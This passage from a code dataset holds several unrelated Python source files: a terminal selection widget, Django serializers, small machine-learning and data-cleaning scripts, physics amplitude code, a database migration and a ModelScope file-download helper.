range(ysize):\n nsub = self._subs.pop(kli)\n sub.buffer.extend(nsub.buffer)\n\n if ysize:\n self._redraw()\n\n sub.delete(False, size - ysize)\n\n def _newsub(self):\n\n old = self._sub\n\n new = self._make()\n\n while True:\n try:\n rune = old.buffer.pop(old.index)\n except IndexError:\n break\n new.buffer.append(rune)\n\n last = self._index == len(self._subs) - 1 and self._among < self._bound\n full = not last\n\n if full:\n self._clear()\n else:\n self._cursor.erase()\n\n index = self._index + 1\n\n self._subs.insert(index, new)\n\n self._index = index\n\n runes = (os.linesep,)\n\n if full:\n self._calibrate()\n self._redraw(skip = True)\n else:\n self._io.send(*runes)\n self._draw(self._index)\n self._focus()\n\n self._dispatch('insert', runes)\n\n def newsub(self):\n\n self._newsub()\n\n def _enter(self):\n\n done = self._finchk()\n\n (self._submit if done else self._newsub)()\n\n\nclass Select(Tool, Originful):\n\n \"\"\"\n Use for cycling through and selecting options.\n \"\"\"\n\n __slots__ = ('_origin', '_options', '_visible', '_changed', '_buffer',\n '_width', '_prefix', '_indent', '_funnel', '_filter')\n\n def __init__(self,\n io,\n cursor,\n height,\n width,\n options,\n prefix,\n indent,\n funnel,\n filter,\n *args,\n **kwargs):\n\n Tool.__init__(self, io, cursor, height - 1, *args, **kwargs)\n\n self._options = options\n self._visible = tuple(range(len(options)))\n self._changed = {}\n\n self._buffer = []\n\n self._width = width\n\n self._prefix = prefix\n self._indent = indent\n\n self._funnel = funnel\n self._filter = filter\n\n self._originate()\n\n @property\n def buffer(self):\n\n return self._buffer\n\n def _place(self):\n\n self._cursor.last(self._among)\n self._cursor.right(self._origin)\n\n def _clear(self):\n\n self._place()\n\n self._cursor.clear()\n\n def _tran(self, index, current, option):\n\n return option\n\n def _chunk(self, lower):\n\n return self._visible[lower:self._upper + 1]\n\n def _fetch(self, index, current):\n\n option = self._options[index][:self._width]\n\n if current:\n try:\n option = self._changed[index]\n except KeyError:\n if self._funnel:\n option = self._funnel(index, option)\n self._changed[index] = option\n\n prefix = self._prefix if current else ' ' * self._indent\n\n option = prefix + self._tran(index, current, option)\n\n return option\n\n def _show(self, index, current):\n\n self._cursor.erase()\n\n option = self._fetch(index, current)\n\n self._io.send(option)\n\n self._cursor.goto(0)\n\n def _draw(self, lower):\n\n indexes = self._chunk(lower)\n\n options = []\n for (cindex, oindex) in enumerate(indexes, start = lower):\n current = cindex == self._index\n option = self._fetch(oindex, current)\n options.append(option)\n\n result = os.linesep.join(options)\n\n self._io.send(result)\n\n @property\n def _shown(self):\n\n return len(self._chunk(self._lower))\n\n def _focus(self):\n\n # if 1 shown and among 0, then move 0\n ysize = self._shown - self._among - 1\n\n self._cursor.last(ysize)\n\n xsize = 0 # doesn't matter\n\n if not self._among:\n xsize += self._origin\n\n self._cursor.right(xsize)\n\n def _slide(self, up, size):\n\n limit = len(self._visible)\n\n size = size % limit\n\n index = self._index + (- size if up else size)\n\n if index < 0:\n index = limit - 1\n else:\n extra = index - limit\n if not extra < 0:\n index = extra\n\n size = index - self._index\n\n up = size < 0\n size = abs(size)\n\n return (up, size, index)\n\n def _move_y(self, up, size):\n\n (up, size, index) = self._slide(up, size)\n\n if up:\n limit = self._index\n else:\n # if 1 sub and index 0, then limit is 0\n limit = len(self._visible) - self._index - 1\n\n # no need to check excess, ``_slide`` ensures\n\n self._show(self._visible[self._index], False)\n\n if up:\n limit = self._among\n self._cursor.last(min(limit, size))\n else:\n limit = self._shown - self._among - 1\n self._cursor.next(min(limit, size))\n\n self._index = index\n\n change = self._calibrate()\n\n if change:\n self._redraw()\n else:\n self._show(self._visible[index], True)\n\n def move(self, up, size):\n\n self._move_y(up, size)\n\n def _specify(self, new):\n\n argument = ''.join(self._buffer)\n\n if new:\n indexes = self._visible\n options = (self._options[index] for index in indexes)\n pairs = zip(indexes, options)\n pairs = self._filter(pairs, argument)\n (indexes, options) = zip(*pairs)\n else:\n indexes = range(len(self._options))\n\n self._clear()\n\n self._visible = indexes\n\n self._index = 0\n\n self._calibrate()\n\n self._redraw(skip = True)\n\n self._dispatch('filter', argument)\n\n def _insert(self, runes):\n\n save = self._buffer.copy()\n\n value = ''.join(runes)\n value = _clean(value)\n\n self._buffer.extend(value)\n\n try:\n self._specify(True)\n except ValueError:\n self._buffer.clear()\n self._buffer.extend(save)\n raise Abort()\n\n def _delete(self, left, size):\n\n if not self._buffer:\n raise Abort()\n\n self._buffer.clear()\n\n self._specify(False)\n\n def _enter(self):\n\n self._submit()\n\n\nclass MultiSelect(Select):\n\n __slots__ = ('_unpin', '_pin', '_chosen')\n\n def __init__(self, unpin, pin, indexes, *args, **kwargs):\n\n super().__init__(*args, **kwargs)\n\n self._unpin = unpin\n self._pin = pin\n\n self._chosen = set(indexes)\n\n @property\n def indexes(self):\n\n return self._chosen\n\n def _tran(self, index, current, option):\n\n signal = self._pin if index in self._chosen else self._unpin\n\n return signal + super()._tran(index, current, option)\n\n def _add(self, index, full):\n\n if full:\n limit = len(self._options)\n if len(self._chosen) == limit:\n raise Abort()\n self._chosen.update(range(limit))\n else:\n self._chosen.add(index)\n\n def _pop(self, index, full):\n\n if full:\n if not self._chosen:\n raise Abort()\n self._chosen.clear()\n else:\n self._chosen.remove(index)\n\n def _inform(self, new):\n\n index = self._visible[self._index]\n\n exists = index in self._chosen\n full = exists if new else not exists\n\n (self._add if new else self._pop)(index, full)\n\n self._redraw()\n\n self._dispatch('inform', new, full)\n\n def _move_x(self, left, size):\n\n new = not left\n\n self._inform(new)\n","sub_path":"macOS/Xcode/Maestral/Maestral/app_packages/survey/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":27136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"604098950","text":"from rest_framework import serializers\nfrom django.contrib.auth.models import User, Group\n\nfrom . import models\n\n\n#\n# Auth and permissions\n#\n\nclass UserSerializer(serializers.ModelSerializer):\n groups = serializers.StringRelatedField(many=True)\n class Meta:\n model = User\n fields = ('first_name', 'last_name', 'email', 'groups',)\n \n #def restore_object(self, attrs, instance=None):\n # # call set_password on user object. Without this\n # # the password will be stored in plain text.\n # user = super(UserSerializer, self).restore_object(attrs, instance)\n # user.set_password(attrs['password'])\n # return user\n\n#\n# Search Page Serializers\n#\n\nclass SearchPage_Serializer(serializers.ModelSerializer):\n tfcs = serializers.PrimaryKeyRelatedField(many=True, read_only=True)\n \n class Meta: \n fields = (\n 'id','origin', 'tlc', 'tlctype','fixedprice','printlabel','specifiedprof',\n 'securitylevel','queryflag','tlcname','fee1',\n 'tfcs'\n )\n model = models.TLC\n\n\n#\n# Testing things out - Serializers\n#\n\nclass Locations_Serializer(serializers.ModelSerializer):\n class Meta:\n fields = (\n 'id','subsectioncode','subsection','department','location','address','postcode','telephone','contact',\n 'url','notes','halo','wsl','referral','dynamics_code','active',\n )\n read_only_fields = ('id',)\n model = models.Locations\n\nclass LOINC_Serializer(serializers.ModelSerializer):\n class Meta:\n fields = (\n 'LOINC_NUM','LONG_COMMON_NAME','COMPONENT'\n )\n model = models.LOINC\n\nclass Map_Serializer(serializers.ModelSerializer):\n loinc = serializers.StringRelatedField(many=False, read_only=True) #LOINC_Serializer(many=False, read_only=True)\n loc1 = Locations_Serializer(many=False, read_only=True)\n loc2 = serializers.StringRelatedField(many=False, read_only=True) #Locations_Serializer(many=False, read_only=True)\n \n class Meta:\n fields = (\n 'origin','tfc','loinc','loc1','loc2','container','result_type'\n )\n read_only_fields = ('origin','tfc')\n model = models.Map\n \n\nclass Form_Serializer(serializers.ModelSerializer):\n map_set = Map_Serializer(many=True, read_only=True)\n \n class Meta:\n fields = (\n 'origin','tfc','wrksection','testname','units','functions','reflab',\n 'ref','flags','repsection','dontwaitforme','rownum','map_set'\n )\n model = models.Form\n\n\nclass TLC_Serializer(serializers.ModelSerializer):\n tfcs = Form_Serializer(many=True, read_only=True)\n \n class Meta: \n fields = (\n 'id','origin', 'tlc', \n 'tlctype','fixedprice','printlabel','specifiedprof',\n 'securitylevel','queryflag','tlcname','fee1',\n 'tfcs'\n )\n model = models.TLC","sub_path":"djangoapi/app/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"121950461","text":"import numpy as np\nimport csv\nreader = csv.reader(open('dt_data.data', 'r'))\ndicts = []\n\n# Read in training feature\nfor row in reader:\n\tdict = {}\n\tdict['age'] = long(row[0])\n\tdict['workclass'] = row[1]\n\tdict['fnlwgt'] = long(row[2])\n\tdict['education'] = row[3]\n\tdict['education-num'] = long(row[4])\n\tdict['marital-status'] = row[5]\n\tdict['occupation'] = row[6]\n\tdict['relationship'] = row[7]\n\tdict['race'] = row[8]\n\tdict['sex'] = row[9]\n\tdict['capital-gain'] = long(row[10])\n\tdict['capital-loss'] = long(row[11])\n\tdict['hours-per-week'] = long(row[12])\n\tdict['native-country'] = row[13]\n\tdicts.append(dict)\n\n# Import and initialize dictionary vetorizer\nfrom sklearn.feature_extraction import DictVectorizer\nvec = DictVectorizer()\ndata = vec.fit_transform(dicts).toarray()\nprint(len(data))\nprint(len(data[0]))\n\n# Read in training label\nreader = csv.reader(open('dt_label.data', 'r'))\nlabel0 = []\nfor row in reader:\n\tlabel0.append(row)\nprint(len(label0))\nlabel = np.array(label0)\n\n# Import and initialize data model\nfrom sklearn import tree\nclf = tree.DecisionTreeClassifier()\nclf.fit(data, label)\n\na = np.array(['L','H'])\n\nprint(clf.predict(data[6])==a[0])\nprint(clf.predict(data[7])==a[1])\n\n# Read in testing feature\nreader = csv.reader(open('dt_data.test', 'r'))\ndicts2 = []\nfor row in reader:\n\tdict = {}\n\tdict['age'] = long(row[0])\n\tdict['workclass'] = row[1]\n\tdict['fnlwgt'] = long(row[2])\n\tdict['education'] = row[3]\n\tdict['education-num'] = long(row[4])\n\tdict['marital-status'] = row[5]\n\tdict['occupation'] = row[6]\n\tdict['relationship'] = row[7]\n\tdict['race'] = row[8]\n\tdict['sex'] = row[9]\n\tdict['capital-gain'] = long(row[10])\n\tdict['capital-loss'] = long(row[11])\n\tdict['hours-per-week'] = long(row[12])\n\tdict['native-country'] = row[13]\n\tdicts2.append(dict)\n\ntestdata = vec.fit_transform(dicts2).toarray()\nprint(len(testdata))\nprint(len(testdata[0]))\n\n# Read in testing label\nreader = csv.reader(open('dt_label.test', 'r'))\ntestlabel0 = []\nfor row in reader:\n\ttestlabel0.append(row)\nprint(len(testlabel0))\ntestlabel = np.array(testlabel0)\n\n# Predict and calculate accuracy\ncount = 0\nfor i in range(0,len(testdata)):\n\tif(clf.predict(testdata[i])==testlabel[i]):\n\t\tcount = count+1\nprint(count)\nprint(1.0*count/len(testdata))\n","sub_path":"DesitionTree.py","file_name":"DesitionTree.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"486116823","text":"import sys\nimport os\n\ndef get_codes(f):\n\tlines = f.readlines()\n\tcodes = []\n\tfor line in lines:\n\t\tif line.startswith('ABC, where D and A are spin-1/2 particles, \n and the decay proceeds via a resonance R in the AB channel (so that R is a baryon \n with spin up to 7/2). \n \"\"\"\n\n p4r = p4a + p4b\n mr = Mass(p4r)\n spinor_r = DiracSpinors(spin_r, p4r, mr)\n p4a_t = QFTObject(1, 0, tf.cast(p4a, dtype = ctype))\n p4d_t = QFTObject(1, 0, tf.cast(p4d, dtype = ctype))\n sab = Bar(spinor_a)\n sd = spinor_d\n\n if parity_r == -1 : \n sab = sab*DiracGamma5()\n if parity_d*parity_r == -1 : \n sd = DiracGamma5()*sd\n\n ampl = Complex(Const(0.), Const(0.))\n for pol_r in range(len(spinor_r)) : \n# print \"pol \", pol_r\n sr = spinor_r[pol_r]\n srb = Bar(spinor_r[pol_r])\n\n if spin_r == 1 : \n ampl += ((sab*sr)*(srb*sd)).tensor\n if spin_r == 3 : \n ampl += (((sab*sr)*p4a_t)*((srb*sd)*p4d_t)).tensor\n if spin_r == 5 : \n ampl += ((((sab*sr)*p4a_t)*p4a_t)*(((srb*sd)*p4d_t)*p4d_t)).tensor\n if spin_r == 7 : \n ampl += (((((sab*sr)*p4a_t)*p4a_t)*p4a_t)*((((srb*sd)*p4d_t)*p4d_t)*p4d_t)).tensor\n\n a = ampl/(2.*tf.cast(mr, dtype = ctype))\n\n if cache : Optimisation.cacheable_tensors += [ a ]\n\n return a\n\ndef CovariantBaryonBCDecayAmplitude(p4a, p4b, p4c, p4d, spinor_a, spinor_d, spin_r, cache = False) : \n \"\"\"\n Covariant amplitude for the decay D->ABC, where D and A are spin-1/2 particles, \n and the decay proceeds via a (integral-spin) resonance R in the BC channel \n (so that R is a meson with spin 0 or 1). \n \"\"\"\n p4r = p4b + p4c\n p4diff = p4b - p4c\n mr = Mass(p4r)\n\n# p4a_t = QFTObject(1, 0, tf.cast(p4a, dtype = ctype))\n# p4d_t = QFTObject(1, 0, tf.cast(p4d, dtype = ctype))\n p4diff_t = QFTObject(1, 0, tf.cast(p4diff, dtype = ctype))\n\n ampl = Complex(Const(0.), Const(0.))\n\n sab = Bar(spinor_a)\n sd = spinor_d\n\n if spin_r == 0 : \n ampl += (sab*sd).tensor\n if spin_r == 2 : \n# sab2 = sab * DiracGamma() * DiracGamma5()\n sab2 = sab * DiracGamma()\n proj = BosonProjector(2, p4r, mr)\n ampl += (((sab2 % sd)*proj)*p4diff_t).tensor\n\n# a = ampl/(2.*tf.cast(mr, dtype = ctype))\n a = ampl\n\n if cache : Optimisation.cacheable_tensors += [ a ]\n\n return a\n","sub_path":"TF/lib/CovariantFormalism.py","file_name":"CovariantFormalism.py","file_ext":"py","file_size_in_byte":2405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"564577304","text":"\"\"\"Compatibility\n\nThis module is to ensure the compatibility between Maya, Avalon and Pyblish\nis maintained.\n\"\"\"\nimport maya.cmds as cmds\nimport os\n\n\ndef remove_googleapiclient():\n \"\"\"Check if the compatibility must be maintained\n\n The Maya 2018 version tries to import the `http` module from\n Maya2018\\plug-ins\\MASH\\scripts\\googleapiclient\\http.py in stead of the\n module from six.py. This import conflict causes a crash Avalon's publisher.\n This is due to Autodesk adding paths to the PYTHONPATH environment variable\n which contain modules instead of only packages.\n \"\"\"\n\n keyword = \"googleapiclient\"\n\n # reconstruct python paths\n python_paths = os.environ[\"PYTHONPATH\"].split(os.pathsep)\n paths = [path for path in python_paths if keyword not in path]\n os.environ[\"PYTHONPATH\"] = os.pathsep.join(paths)\n\n\ndef install():\n \"\"\"Run all compatibility functions\"\"\"\n if cmds.about(version=True) == \"2018\":\n remove_googleapiclient()\n","sub_path":"avalon/maya/compat.py","file_name":"compat.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"254026983","text":"class Solution:\n def countBits(self, num):\n \"\"\"\n :type num: int\n :rtype: List[int]\n \"\"\"\n ans = [0]\n while len(ans) < num + 1:\n ans += [1 + x for x in ans]\n # len(ans) > num\n return ans[:num+1]\n\n# Solution:\n# 大体思路和自己的一样\n# 但是 1本身也是 1 + 前一个unit的 0\n# 每次都是 1 + 前一个unit的每一项\n# 这样可以每次更新ans,\n# 每次的ans都是计算完这个unit之后的结果\n\n# Beats: 99.78%\n# Runtime: 104ms\n# medium","sub_path":"338-Counting-Bits-update-ans.py","file_name":"338-Counting-Bits-update-ans.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"497931050","text":"\"\"\"add persons, credits\n\nRevision ID: 46cc49df2efd\nRevises: daf722ec18f0\nCreate Date: 2020-07-19 17:54:31.886640\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '46cc49df2efd'\ndown_revision = 'daf722ec18f0'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('video_persons',\n sa.Column('id', sa.Text(), nullable=False),\n sa.Column('image_url', sa.Text(), nullable=True),\n sa.Column('birthday', sa.Date(), nullable=True),\n sa.Column('known_for', sa.Text(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('video_credits',\n sa.Column('id', sa.Text(), nullable=False),\n sa.Column('video_id', sa.Text(), nullable=False),\n sa.Column('person_id', sa.Text(), nullable=False),\n sa.Column('character', sa.Text(), nullable=True),\n sa.Column('order', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['person_id'], ['video_persons.id'], ),\n sa.ForeignKeyConstraint(['video_id'], ['videos.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('video_credits')\n op.drop_table('video_persons')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/46cc49df2efd_add_persons_credits.py","file_name":"46cc49df2efd_add_persons_credits.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"185942793","text":"'''\n8.5 Open the file mbox-short.txt and read it line by line. When you find a line\n that starts with 'From ' like the following line:\n\nFrom stephen.marquard@uct.ac.za Sat Jan 5 09:14:16 2008\n\nYou will parse the From line using split() and print out the second word in the\n line (i.e. the entire address of the person who sent the message). Then print\n out a count at the end.\n\nHint: make sure not to include the lines that start with 'From:'.\n\nYou can download the sample data at http://www.py4e.com/code3/mbox-short.txt\n'''\n\nfname = input('Enter the file name :')\ntry :\n file = open(fname, 'r')\nexcept :\n print(\"File ca not be found : \", file)\n quit()\n\ntargetline = []\ncount = 0\n\nfor line in file :\n if not line.startswith('From ') :\n continue\n\n count += 1\n targetline = line.split()\n print(targetline[1])\n\nprint('There were ' + str(count) + ' lines in the file with From as the first word')\n","sub_path":"py4e/Assignment_8.5.py","file_name":"Assignment_8.5.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"87495300","text":"import argparse\nimport logging \nimport hashlib\nlogging.basicConfig(level=logging.INFO)\n\nfrom urllib.parse import urlparse\nimport pandas as pd\n\nlogger = logging.getLogger(__name__)\n\ndef main(filename):\n logger.info('Start Cleaning process')\n df = _read_data(filename)\n newspaper_uid = _extract_newspaper_uid(filename)\n df = _add_newspaper_uid_column(df,newspaper_uid)\n df = _extract_host(df)\n df=_fill_missing_titles(df)\n df = _generate_uids_for_rows(df)\n df = _remove_new_lines_from_body(df)\n df = _remove_duplicate_entries(df, 'title')\n df = _drop_rows_with_missing_values(df)\n _save_data(df,filename)\n return df\n\n\ndef _remove_duplicate_entries(df, column_name):\n logger.info('Removing duplicates entries')\n df.drop_duplicates(subset=[column_name], keep='first', inplace=True)\n return df\n\n\ndef _drop_rows_with_missing_values(df):\n logger.info('Dropping rows with missing values')\n return df.dropna()\n\ndef _save_data(df, filename):\n clean_filename = 'clean_{}'.format(filename)\n logger.info('Saving data at location: {}'.format(clean_filename))\n df.to_csv(clean_filename)\n\ndef _remove_new_lines_from_body(df):\n logger.info('Remove new lines from body')\n stripped_body = (df\n .apply(lambda row: row['body'], axis=1)\n .astype(str).apply(lambda body: list(body))\n .apply(lambda letters: list(map(lambda letter: letter.replace('\\n', ' '), letters)))\n .apply(lambda letters: ''.join(letters))\n )\n df['body'] = stripped_body\n return df\n\ndef _generate_uids_for_rows(df):\n logger.info('Generating uids for each row')\n uids = (df\n .apply(lambda row: hashlib.md5(bytes(row['url'].encode())), axis=1)\n .apply(lambda hash_object: hash_object.hexdigest()) \n )\n df['uid'] = uids\n return df.set_index('uid')\n\ndef _fill_missing_titles(df):\n logger.info('Filling missing titles')\n missing_titles_mask = df['title'].isna()\n\n missing_titles = (df[missing_titles_mask]['url']\n .str.extract(r'(?P[^/]+)$')\n .astype(str).applymap(lambda title: title.split('-'))\n .applymap(lambda title_word_list: ''.join(title_word_list))\n )\n\n df.loc[missing_titles_mask, 'title'] = missing_titles.loc[:,'missing_titles']\n\n return df\n\n\ndef _extract_host(df):\n logger.info('Extracting host from urls')\n df['host'] = df['url'].apply(lambda url: urlparse(url).netloc)\n return df\n\n\ndef _add_newspaper_uid_column(df,newspaper_uid):\n logger.info('Filling newspaper_uid column with {}'.format(newspaper_uid))\n df['newspaper_uid'] = newspaper_uid\n return df\n\n\ndef _extract_newspaper_uid(filename):\n logger.info('Extracting newspaper uid')\n newspaper_uid = filename.split('_')[0]\n logger.info('Newspaper uid has detected: {}'.format(newspaper_uid))\n return newspaper_uid\n\ndef _read_data(filename):\n logger.info('Reading file {}'.format(filename))\n return pd.read_csv(filename)\n\nif __name__=='__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('filename',\n help='The path to the dirty data',\n type=str)\n\n arg = parser.parse_args()\n df = main(arg.filename)\n print(df)\n \n\n","sub_path":"Curso_Data_platzi/Ingenieriadedatos/web_scrapper_curso_data_eng/newspaper_receipe.py","file_name":"newspaper_receipe.py","file_ext":"py","file_size_in_byte":3368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"29255759","text":"import packet\nfrom abc import ABC, abstractmethod\n\n\nclass Sequence(packet.Packet, ABC):\n def __init__(self, channel_nr: int, unit: str, resolution: float, buffer, device, description, date):\n self.channel_nr = channel_nr\n self.unit = unit\n self.resolution = resolution\n self.buffer = buffer\n super().__init__(device, description, date)\n\n @abstractmethod\n def __str__(self):\n return \"{} {} {} {}\".format(self.channel_nr, self.unit, self.resolution, self.buffer)\n","sub_path":"sequence.py","file_name":"sequence.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"387293312","text":"# -*- coding: utf-8 -*-\n\n\nimport os\n\nimport numpy as np\nimport tensorflow as tf\nfrom imutils import paths\nfrom sklearn.metrics import classification_report\nfrom sklearn.model_selection import train_test_split\n\n\ndef get_model():\n baseModel = tf.keras.applications.MobileNetV2(weights=\"imagenet\", include_top=False,\n input_tensor=tf.keras.layers.Input(shape=(224, 224, 3)))\n base_model = baseModel.output\n base_model = tf.keras.layers.AveragePooling2D(pool_size=(7, 7))(base_model)\n base_model = tf.keras.layers.Flatten(name=\"flatten\")(base_model)\n base_model = tf.keras.layers.Dense(128, activation=\"relu\")(base_model)\n base_model = tf.keras.layers.Dropout(0.5)(base_model)\n base_model = tf.keras.layers.Dense(2, activation=\"softmax\")(base_model)\n model = tf.keras.models.Model(inputs=baseModel.input, outputs=base_model)\n for layer in baseModel.layers:\n layer.trainable = False\n es = tf.keras.callbacks.EarlyStopping(patience=2)\n\n opt = tf.keras.optimizers.Adam(lr=1e-4, decay=1e-4 / 20)\n model.compile(loss=\"binary_crossentropy\", optimizer=opt,\n metrics=[\"accuracy\"])\n\n return model\n\n\ndef train():\n print(\"[INFO] loading images...\")\n imagePaths = list(paths.list_images(\"train\"))\n if len(imagePaths) == 0:\n raise Exception(\n \"Train images not found!. Please verify the download path\")\n data = []\n labels = []\n # loop over the image paths\n for imagePath in imagePaths:\n # extract the class label from the filename\n label = imagePath.split(os.path.sep)[-2]\n # load the input image (224x224) and preprocess it\n image = tf.keras.preprocessing.image.load_img(\n imagePath, target_size=(224, 224))\n image = tf.keras.preprocessing.image.img_to_array(image)\n image = tf.keras.applications.mobilenet_v2.preprocess_input(image)\n # update the data and labels lists, respectively\n data.append(image)\n\n labelC = 0 if label == \"without_mask\" else 1\n labels.append(labelC)\n # convert the data and labels to NumPy arrays\n data = np.array(data, dtype=\"float32\")\n labels = np.array(labels)\n\n np.unique(labels)\n\n labels = tf.keras.utils.to_categorical(labels)\n\n (trainX, testX, trainY, testY) = train_test_split(data, labels,\n test_size=0.20, stratify=labels, random_state=42)\n es = tf.keras.callbacks.EarlyStopping(patience=2)\n\n model.fit(trainX, trainY, steps_per_epoch=32, validation_data=(\n testX, testY), validation_steps=len(testX)/32, epochs=20, callbacks=[es])\n\n model.save(\"masknet/mask_weights/mask_model.h5\")\n\n model.save_weights(\"masknet/mask_weights/mask_weights.h5\")\n\n\ndef evaluate():\n imagePaths = list(paths.list_images(\"test\"))\n dataTest = []\n labelsTest = []\n\n for imagePath in imagePaths:\n # extract the class label from the filename\n label = imagePath.split(os.path.sep)[-2]\n\n image = tf.keras.preprocessing.image.load_img(\n imagePath, target_size=(224, 224))\n image = tf.keras.preprocessing.image.img_to_array(image)\n image = tf.keras.applications.mobilenet_v2.preprocess_input(image)\n # update the data and labels lists, respectively\n dataTest.append(image)\n labelC = 0 if label == \"without_mask\" else 1\n labelsTest.append(labelC)\n\n dataTest = np.array(dataTest, dtype=\"float32\")\n labelsTest = np.array(labelsTest)\n\n labelsTest_B = tf.keras.utils.to_categorical(labelsTest)\n\n predIdxs = model.predict(dataTest, batch_size=32)\n\n predIdxs = np.argmax(predIdxs, axis=1)\n\n print(classification_report(labelsTest_B.argmax(axis=1), predIdxs,\n target_names=['With', 'Without']))\n\n\nmodel = get_model()\n\ntrain()\n\nevaluate()\n","sub_path":"train/detect_mask.py","file_name":"detect_mask.py","file_ext":"py","file_size_in_byte":3875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"649193722","text":"# Copyright (c) Alibaba, Inc. and its affiliates.\n\nimport copy\nimport os\nimport tempfile\nfrom functools import partial\nfrom http.cookiejar import CookieJar\nfrom pathlib import Path\nfrom typing import Dict, Optional, Union\n\nimport requests\nfrom tqdm import tqdm\n\nfrom modelscope import __version__\nfrom modelscope.hub.api import HubApi, ModelScopeConfig\nfrom modelscope.utils.constant import DEFAULT_MODEL_REVISION\nfrom modelscope.utils.logger import get_logger\nfrom .constants import FILE_HASH\nfrom .errors import FileDownloadError, NotExistError\nfrom .utils.caching import ModelFileSystemCache\nfrom .utils.utils import (file_integrity_validation, get_cache_dir,\n get_endpoint, model_id_to_group_owner_name)\n\nlogger = get_logger()\n\n\ndef model_file_download(\n model_id: str,\n file_path: str,\n revision: Optional[str] = DEFAULT_MODEL_REVISION,\n cache_dir: Optional[str] = None,\n user_agent: Union[Dict, str, None] = None,\n local_files_only: Optional[bool] = False,\n cookies: Optional[CookieJar] = None,\n) -> Optional[str]: # pragma: no cover\n \"\"\"\n Download from a given URL and cache it if it's not already present in the\n local cache.\n\n Given a URL, this function looks for the corresponding file in the local\n cache. If it's not there, download it. Then return the path to the cached\n file.\n\n Args:\n model_id (`str`):\n The model to whom the file to be downloaded belongs.\n file_path(`str`):\n Path of the file to be downloaded, relative to the root of model repo\n revision(`str`, *optional*):\n revision of the model file to be downloaded.\n Can be any of a branch, tag or commit hash\n cache_dir (`str`, `Path`, *optional*):\n Path to the folder where cached files are stored.\n user_agent (`dict`, `str`, *optional*):\n The user-agent info in the form of a dictionary or a string.\n local_files_only (`bool`, *optional*, defaults to `False`):\n If `True`, avoid downloading the file and return the path to the\n local cached file if it exists.\n if `False`, download the file anyway even it exists\n\n Returns:\n Local path (string) of file or if networking is off, last version of\n file cached on disk.\n\n \n\n Raises the following errors:\n\n - [`EnvironmentError`](https://docs.python.org/3/library/exceptions.html#EnvironmentError)\n if `use_auth_token=True` and the token cannot be found.\n - [`OSError`](https://docs.python.org/3/library/exceptions.html#OSError)\n if ETag cannot be determined.\n - [`ValueError`](https://docs.python.org/3/library/exceptions.html#ValueError)\n if some parameter value is invalid\n\n \n \"\"\"\n if cache_dir is None:\n cache_dir = get_cache_dir()\n if isinstance(cache_dir, Path):\n cache_dir = str(cache_dir)\n temporary_cache_dir = os.path.join(cache_dir, 'temp')\n os.makedirs(temporary_cache_dir, exist_ok=True)\n\n group_or_owner, name = model_id_to_group_owner_name(model_id)\n\n cache = ModelFileSystemCache(cache_dir, group_or_owner, name)\n\n # if local_files_only is `True` and the file already exists in cached_path\n # return the cached path\n if local_files_only:\n cached_file_path = cache.get_file_by_path(file_path)\n if cached_file_path is not None:\n logger.warning(\n \"File exists in local cache, but we're not sure it's up to date\"\n )\n return cached_file_path\n else:\n raise ValueError(\n 'Cannot find the requested files in the cached path and outgoing'\n ' traffic has been disabled. To enable model look-ups and downloads'\n \" online, set 'local_files_only' to False.\")\n\n _api = HubApi()\n headers = {\n 'user-agent': ModelScopeConfig.get_user_agent(user_agent=user_agent, )\n }\n if cookies is None:\n cookies = ModelScopeConfig.get_cookies()\n\n revision = _api.get_valid_revision(\n model_id, revision=revision, cookies=cookies)\n file_to_download_info = None\n # we need to confirm the version is up-to-date\n # we need to get the file list to check if the latest version is cached, if so return, otherwise download\n model_files = _api.get_model_files(\n model_id=model_id,\n revision=revision,\n recursive=True,\n use_cookies=False if cookies is None else cookies)\n\n for model_file in model_files:\n if model_file['Type'] == 'tree':\n continue\n\n if model_file['Path'] == file_path:\n if cache.exists(model_file):\n logger.info(\n f'File {model_file[\"Name\"]} already in cache, skip downloading!'\n )\n return cache.get_file_by_info(model_file)\n else:\n file_to_download_info = model_file\n break\n\n if file_to_download_info is None:\n raise NotExistError('The file path: %s not exist in: %s' %\n (file_path, model_id))\n\n # we need to download again\n url_to_download = get_file_download_url(model_id, file_path, revision)\n file_to_download_info = {\n 'Path': file_path,\n 'Revision': file_to_download_info['Revision'],\n FILE_HASH: file_to_download_info[FILE_HASH]\n }\n\n temp_file_name = next(tempfile._get_candidate_names())\n http_get_file(\n url_to_download,\n temporary_cache_dir,\n temp_file_name,\n headers=headers,\n cookies=None if cookies is None else cookies.get_dict())\n temp_file_path = os.path.join(temporary_cache_dir, 